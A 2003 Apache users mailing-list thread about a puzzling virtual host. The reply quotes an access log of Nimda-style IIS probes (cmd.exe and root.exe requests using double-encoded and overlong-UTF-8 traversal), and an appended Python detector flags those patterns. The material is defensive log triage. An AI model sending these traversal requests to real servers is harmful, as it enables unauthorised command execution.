Posted to users@httpd.apache.org by Jalene Joyner <Ja...@mail.state.ar.us> on 2003/01/06 18:52:06 UTC

[users@httpd] virtual host?


I have set up an Apache server (1.3.27) on Red Hat Linux 7.3 with 3-4
virtual IP addresses configured.  One of my virtual servers is
broadcasting messages over the intranet looking for a WINS server.  How
can I get this turned off and/or is this in fact an Apache problem?  Or
a network configuration problem on the Red Hat side?

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Re: [users@httpd] virtual host?

Posted by Gary Turner <kk...@sbcglobal.net>.
Jalene Joyner wrote:

>I have set up an Apache server (1.3.27) on Red Hat Linux 7.3 with 3-4
>virtual IP addresses configured.  One of my virtual servers is
>broadcasting messages over the intranet looking for a WINS server.  How
>can I get this turned off and/or is this in fact an Apache problem?  Or
>a network configuration problem on the Red Hat side?

In the general sense, messages are not broadcast.  Also, Linux and
Apache are not normally susceptible to viral or worm infections.  Are
you seeing something like this in your access.log?

$ tail /var/log/apache/access.log
65.71.73.123 - - [06/Jan/2003:15:12:40 -0600] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
65.71.73.123 - - [06/Jan/2003:15:12:41 -0600] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 279 "-" "-"
65.71.73.123 - - [06/Jan/2003:15:12:41 -0600] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
65.71.73.123 - - [06/Jan/2003:15:12:41 -0600] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
65.71.73.123 - - [06/Jan/2003:15:12:41 -0600] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-"
"-"
65.71.73.123 - - [06/Jan/2003:15:12:45 -0600] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 320 "-" "-"
65.71.73.123 - - [06/Jan/2003:15:12:45 -0600] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 320 "-" "-"
65.71.73.123 - - [06/Jan/2003:15:12:49 -0600] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 336 "-" "-"
65.71.73.123 - - [06/Jan/2003:15:12:49 -0600] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-"
"-"
65.71.73.123 - - [06/Jan/2003:15:12:50 -0600] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-"
"-"

If so, you are seeing attempts by an infected Microsoft system to crack
your server.  Google NIMDA for more info (see the CERN ref).

If you're seeing something else, post the evidence you're seeing.
--
gt                  kk5st@sbcglobal.net
 If someone tells you---
 "I have a sense of humor, but that's not funny." 
                                  ---they don't.
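
A way to triage an access log for the probe pattern quoted in the reply above, as an added example that is not part of the original thread. The first three sample entries are taken from the post with the mail client's line wrapping undone; the two benign entries, the signature names and the function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Sample log: three probe entries from the post (re-joined onto one line each)
# plus two constructed benign requests from a documentation-range address.
SAMPLE_LOG = """\
65.71.73.123 - - [06/Jan/2003:15:12:40 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
65.71.73.123 - - [06/Jan/2003:15:12:41 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
65.71.73.123 - - [06/Jan/2003:15:12:50 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
192.0.2.10 - - [06/Jan/2003:15:13:02 -0600] "GET /index.html HTTP/1.0" 200 1043 "-" "-"
192.0.2.10 - - [06/Jan/2003:15:13:05 -0600] "GET /downloads/setup.exe HTTP/1.0" 200 52311 "-" "-"
"""

# client IP, method, raw request URL and status from a common/combined log line
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')

SIGNATURES = {
    # request for a Windows command shell binary, as in the quoted probes
    "iis_shell": re.compile(r"/(?:root|cmd)\.exe(?:\?|$)", re.I),
    # percent-encoded percent sign followed by hex digits (e.g. %255c)
    "double_encoding": re.compile(r"%25[0-9a-f]{2}", re.I),
    # 0xC0 and 0xC1 never occur in valid UTF-8, so these are overlong encodings
    "overlong_utf8": re.compile(r"%c[01]%[0-9a-f]{2}", re.I),
}

def classify(url):
    """Return the set of signature names the raw request URL matches."""
    hits = {name for name, rx in SIGNATURES.items() if rx.search(url)}
    # Decode twice so that double-encoded separators become visible.
    if re.search(r"\.\.[/\\]", unquote(unquote(url))):
        hits.add("traversal")
    return hits

def summarize(log_text):
    """Group flagged requests by client IP; 'served' counts those not answered 4xx/5xx."""
    report = defaultdict(lambda: {"requests": 0, "signatures": set(), "served": 0})
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, _method, url, status = m.groups()
        hits = classify(url)
        if hits:
            entry = report[ip]
            entry["requests"] += 1
            entry["signatures"] |= hits
            entry["served"] += 1 if int(status) < 400 else 0
    return dict(report)
```

A non-zero `served` count is the part worth following up: it means the server answered a flagged request with something other than an error, unlike the 404 responses in the quoted log.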
